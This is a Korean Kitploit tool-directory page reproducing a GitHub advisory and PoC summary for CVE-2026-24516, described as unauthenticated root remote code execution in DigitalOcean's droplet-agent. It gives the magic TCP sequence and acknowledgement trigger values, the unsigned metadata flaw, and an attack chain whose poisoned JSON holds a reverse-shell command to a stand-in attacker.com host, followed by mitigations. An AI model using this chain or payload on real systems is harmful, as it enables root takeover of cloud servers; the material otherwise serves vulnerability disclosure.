Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24516-DigitalOcean-RCE. — CVE-2026-24516 기술 분석 및 PoC: DigitalOcean Droplet Agent의 인증되지 않은 루트 원격 코드 실행 (CVSS 10.0). | Kitploit
도구/GitHubGitHub/poxsky/cve-2026-24516-digitalocean-rce.
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationCloud SecurityPapers & Research

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Red Teaming
Payload Development
GitHubpoxsky/cve-2026-24516-digitalocean-rce.

CVE-2026-24516-DigitalOcean-RCE.

CVE-2026-24516 기술 분석 및 PoC: DigitalOcean Droplet Agent의 인증되지 않은 루트 원격 코드 실행 (CVSS 10.0).

저장소 보기
6개월 전아직 검토되지 않음

CVE-2026-24516-DigitalOcean-RCE.

CVE-2026-24516에 대한 기술 분석 및 PoC: DigitalOcean Droplet Agent의 인증되지 않은 루트 원격 코드 실행 (CVSS 10.0).

기술 보안 권고문: CVE-2026-24516

ID: CVE-2026-24516

제목: 메타데이터 포이즈닝 및 사이드 채널을 통한 인증되지 않은 루트 RCE

심각도: 치명적 (CVSS v3.1: 10.0 / AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

연구자: Anmol Singh Rajput (@poxsky)

영향 범위: DigitalOcean Droplet Agent (droplet-agent) <= v1.3.2

================================================================================

  1. 아키텍처 개요

'droplet-agent'는 원격 텔레메트리 및 진단을 위해 설계된 권한 있는 시스템 데몬(UID 0)입니다. 특정 신호 시퀀스가 수신될 때까지 수동 모니터링 상태를 유지합니다. 핵심 취약점은 링크-로컬 메타데이터 서비스(169.254.169.254)의 "암묵적 신뢰 모델"에 있으며, 이는 암호학적 무결성 검사를 결여하고 있습니다.

  1. 심층 분석: 익스플로잇 프리미티브

A. 수동적 TCP 사이드 채널 (신호 계층) 에이전트는 포트 22에서 원시 소켓 리스너(internal/metadata/watcher/ssh_watcher.go)를 사용합니다. TCP 헤더의 하드코딩된 매직 상수를 기반으로 IDLE에서 ACTIVE로 상태 전환을 수행합니다:

  • 시퀀스 번호 (Seq): 0x419AD37 (68796879 -> "DODO")
  • 확인 응답 번호 (Ack): 0xCF259 (848489 -> "TTY")

분석: 이는 결정론적 트리거를 생성합니다. 외부 공격자는 이러한 매직 값을 가진 단일 TCP SYN 패킷을 스푸핑하여 인프라 제어 플레인을 가장할 수 있습니다.

B. 신뢰 경계 위반 (링크-로컬 결함) 신호가 수신되면 에이전트는 클라우드 메타데이터 엔드포인트에서 JSON 명령을 가져옵니다. 취약점은 진위 검증 부재입니다. 에이전트는 169.254.169.254 영역을 "강화된 신뢰 영역"으로 취급하여 페이로드 서명(HMAC/mTLS)을 검증하지 않습니다.

C. 싱크: 살균되지 않은 명령 주입 'TroubleshootingActioner'(internal/troubleshooting/actioner/actioner.go)에는 'requesting' 배열을 파싱하는 싱크가 포함되어 있습니다.

  • 취약한 싱크: exec.CommandContext(ctx, name, args...)
  • 로직 결함: 검증 로직은 접두사 검사('command:')만 수행합니다. 입력을 토큰화하거나 셸 메타문자(;, |, &, $)를 살균하지 못합니다.
  1. 무기화된 공격 체인 (SSRF-TO-ROOT-RCE)

  1. 가장: 공격자는 호스팅된 애플리케이션에서 SSRF를 식별하여 링크-로컬 메타데이터 서비스로 요청을 프록시합니다.

  2. 포이즈닝: 공격자는 다음을 반환하는 악성 메타데이터 서버를 설정합니다: {"requesting": ["command:bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"]}

  3. 노크: 공격자는 포트 22로 "DODO-TTY" TCP 트리거를 전송합니다.

  4. 실행: 에이전트는 포이즈닝된 JSON을 가져와 유효 UID 0 (루트)으로 리버스 셸을 실행합니다.

  5. 영향 평가


  • 전체 시스템 장악: 완전한 커널 수준 접근.
  • 지속성: 루트킷 또는 지속적인 SSH 백도어를 주입할 수 있는 능력.
  • 테넌트 위험: 모든 고객 앱의 단일 SSRF가 모든 OS 수준 방화벽을 우회하여 전체 droplet 장악으로 이어집니다.
  1. 완화 전략

  • 암호학적 무결성: 모든 메타데이터 페이로드에 JWT/HMAC 서명을 구현합니다.
  • 네임스페이스 격리: 제한된 PID/네트워크 네임스페이스에서 actioner를 실행합니다.
  • 허용 목록: 변경 불가능한 진단 바이너리 세트를 하드코딩하고 모든 동적 문자열 입력을 거부합니다.
1000071250 1000071254 1000071252 1000071246 1000071243 1000071244 1000071247 1000071249 1000071251
도구 다운로드